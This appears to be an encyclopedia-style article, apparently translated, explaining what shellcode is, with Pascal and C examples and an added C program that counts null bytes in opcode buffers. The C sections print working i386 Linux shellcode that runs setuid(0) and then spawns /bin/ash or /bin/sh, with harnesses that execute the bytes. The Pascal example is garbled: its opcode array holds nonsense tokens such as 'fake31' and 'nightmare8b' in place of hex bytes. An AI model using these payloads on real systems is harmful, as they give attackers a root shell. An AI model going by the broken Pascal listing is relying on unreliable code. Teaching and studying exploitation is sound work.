Shellcode
A shellcode is a sequence of instructions, generally written in assembly language and translated into opcodes (a sequence of hexadecimal byte values), that is usually injected into a program's execution stack so that the machine on which it resides executes the operation that was programmed.
Term
The term shellcode derives from its original purpose: it was the portion of an exploit used to obtain a shell, and that is still the most common purpose for which shellcodes are used.
Pascal shellcode example
To execute a shellcode, a higher-level language is usually used, such as Pascal. The opcodes obtained from the assembly code are listed in a byte array and loaded into a callable prototype, which is then invoked.
An example of a shellcode is the following:
Prototype Ejec

' Variables.
Var ShellCode[]:Byte    ' Byte array for the opcodes.
Var Prototypo:Ejec      ' Prototype used to run the shellcode.

' We load the shellcode.
ShellCode = [ fake31, faked2, hipb2, fake30, fake8b, fake8b, age12, hip8b, age52, hip8b, hip8b, age52, fake1c, nightmare8b, nightmare42 _
  , fake08, fake8b, age72, age20, hip8b, age12, stranger7e, fake0c, age33, fake75, nightmaref2, nightmare89, fakec7, nightmare03 _
  , fake78, fake3c, hip8b, hip57, fake78, stranger8b, age7a, hip20, fake01, fakec7, nightmare31, fakeed, fake8b _
  , fake34, granddaph, fake01, fakec6, fake45, fake81, fake3e, fake46, fake74, fake61, fake75, fakef2, fake81, fake7e _
  , fake08, fake45, hip78, fake69, age75, fake8b, fake8b, fake24, age24, fake01, fakec7, fake66, stranger8b, nightmare2c _
  , fake6f, hip8b, fake7a, age1c, outdoors01, age8b, age7c, hipfc, outdoors01, nightmarec7, stranger68, stranger79, stranger74 _
  , age7 b, hipfc, hipfc, hipfc, hipp, hipp, hipp, hipp, hippc, hipp, hipp, hippc, hipp, hipp, fake65, fake01, hip68, fake6b, fake65, fake6e, fake42, fake20, fake42, fake72, fake6f, fake89, fake89, fake1, fakefe _
  , fake49, fake0b, fake31, fakec0, fake51, fake50, fakeff, faked7 ]

' We point the prototype at the code to run.
Prototypo@ = ShellCode[0]@

' We run the shellcode.
Prototypo
As you can see, the opcodes are hexadecimal values converted to bytes (integer values between 0 and 255), which the machine interprets as instructions and executes.
C shellcode example
The following example shows a shellcode stored in a character array of a program written in C:
char shellcode[] =
    "\x31\xc0"      /* xorl %eax,%eax */
    "\x31\xdb"      /* xorl %ebx,%ebx */
    "\x31\xc9"      /* xorl %ecx,%ecx */
    "\xb0\x46"      /* movb $0x46,%al   (setuid syscall number) */
    "\xcd\x80"      /* int $0x80 */
    "\x50"          /* pushl %eax       (NUL terminator for the path) */
    "\x68/ash"      /* pushl $0x6873612f */
    "\x68/bin"      /* pushl $0x6e69622f */
    "\x89\xe3"      /* movl %esp,%ebx   (ebx = "/bin/ash") */
    "\x50"          /* pushl %eax */
    "\x53"          /* pushl %ebx */
    "\x89\xe1"      /* movl %esp,%ecx   (ecx = argv) */
    "\xb0\x0b"      /* movb $0x0b,%al   (execve syscall number) */
    "\xcd\x80";     /* int $0x80 */
So a shellcode is machine code written out in hexadecimal notation. It is then embedded in programs written in C, as in the following example:
// shellcode.c
// compile with gcc shellcode.c -o shellcode
// Note: current toolchains place string literals in non-executable memory,
// so calling into the literal directly faults unless that memory is made executable.
int main(void)
{
    /* cast the byte string to a function pointer and call it */
    ((void (*)(void))
        "\xeb\x19\x31\xc0\x31\xdb\x31\xd2\x31\xc9"   /* jmp to the call below; zero eax, ebx, edx, ecx */
        "\xb0\x04\xb3\x01\x59\xb2\x21\xcd\x80\x31"   /* write(1, msg, 0x21) */
        "\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe2\xff"   /* exit(0); call back to offset 2 (rel32 = -30), */
        "\xff\xff\x76\x69\x73\x69\x74\x61\x20\x68"   /* leaving the address of the text that follows on the stack */
        "\x74\x74\x70\x3a\x2f\x2f\x68\x65\x69\x6e"
        "\x7a\x2e\x68\x65\x72\x6c\x69\x74\x7a\x2e"
        "\x63\x6c\x20\x3d\x29"                       /* "visita http://heinz.herlitz.cl =)" */
    )();
    return 0;
}
Or this one:
/* execve("/bin//sh", ["/bin//sh"], NULL) on i386 Linux */
char shellcode[] =
    "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x2f"     /* xorl %eax,%eax; pushl %eax; pushl "//sh"; ... */
    "\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0" /* pushl "/bin"; movl %esp,%ebx; pushl %eax; pushl %ebx; movl %esp,%ecx */
    "\x0b\xcd\x80";                            /* movb $0x0b,%al; int $0x80 */

int main(void)
{
    void (*fp)(void);
    fp = (void (*)(void))shellcode;   /* point a function pointer at the byte array */
    fp();                             /* faults on NX-protected builds unless the array is executable */
    return 0;
}
Information
Shellcodes must be short, since they are injected onto the stack, which usually offers little space.
Shellcodes are used to execute code by exploiting a class of vulnerabilities called buffer overflows. Usually the shellcode is written to launch a command interpreter (a shell) on the compromised machine.
It is common for the assembled shellcode to contain null bytes, which must be removed from it, since they would slow down the execution of the shellcode. To do this, the programmer uses various techniques, such as replacing the instructions that generate null bytes with others that do not, for example using an XOR operation or moving values through the smaller registers (such as AH or AL), so that the shellcode becomes really injectable.
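The following C program is an added example (not code from the original article) that makes the null-byte problem of the previous paragraph measurable: it compares the encoding of an instruction that produces 0x00 bytes with its XOR or AL-register replacement, and reports how many payload bytes a NUL-terminated copy such as strcpy() actually transfers into a buffer. The instruction encodings are constructed sample input.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>
/* Constructed i386 encodings (sample input assumed for this example, not
 * taken from the page). Each pair does the same job: one form contains
 * 0x00 bytes, the other, using XOR or the smaller AL register, does not. */
static const unsigned char MOV_EAX_0[]  = {0xb8, 0x00, 0x00, 0x00, 0x00}; /* movl $0,%eax    */
static const unsigned char XOR_EAX[]    = {0x31, 0xc0};                   /* xorl %eax,%eax  */
static const unsigned char MOV_EAX_0B[] = {0xb8, 0x0b, 0x00, 0x00, 0x00}; /* movl $0x0b,%eax */
static const unsigned char MOV_AL_0B[]  = {0xb0, 0x0b};                   /* movb $0x0b,%al  */
/* Number of 0x00 bytes in an opcode buffer; a null-free payload returns 0. */
size_t count_nul_bytes(const unsigned char *code, size_t len)
{
    size_t n = 0;
    for (size_t i = 0; i < len; i++)
        if (code[i] == 0x00)
            n++;
    return n;
}

/* How many payload bytes a NUL-terminated copy such as strcpy() delivers:
 * the copy stops at the first 0x00, so every byte after it never arrives.
 * Payloads of 64 bytes or more are rejected (returns 0). */
size_t bytes_delivered_by_strcpy(const unsigned char *code, size_t len)
{
    char src[64] = {0};             /* the payload as strcpy() sees it */
    unsigned char dst[64];
    size_t i = 0;
    if (len >= sizeof src)
        return 0;
    memcpy(src, code, len);
    memset(dst, 0x90, sizeof dst);  /* marker fill makes truncation visible */
    strcpy((char *)dst, src);
    /* count leading bytes of dst that still equal the intended payload */
    while (i < len && code[i] != 0x00 && dst[i] == code[i])
        i++;
    return i;
}

int main(void)
{
    printf("movl $0,%%eax    : %zu NUL bytes\n", count_nul_bytes(MOV_EAX_0, sizeof MOV_EAX_0));
    printf("xorl %%eax,%%eax : %zu NUL bytes\n", count_nul_bytes(XOR_EAX, sizeof XOR_EAX));
    printf("movl $0x0b,%%eax : %zu of %zu bytes survive strcpy\n",
           bytes_delivered_by_strcpy(MOV_EAX_0B, sizeof MOV_EAX_0B), sizeof MOV_EAX_0B);
    printf("movb $0x0b,%%al  : %zu of %zu bytes survive strcpy\n",
           bytes_delivered_by_strcpy(MOV_AL_0B, sizeof MOV_AL_0B), sizeof MOV_AL_0B);
    return 0;
}
```

The same check can be run over any opcode buffer before it is embedded in a test harness: a non-zero count from count_nul_bytes() pinpoints an instruction that still needs a null-free replacement.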
Related content
X-rays
Server
Multitask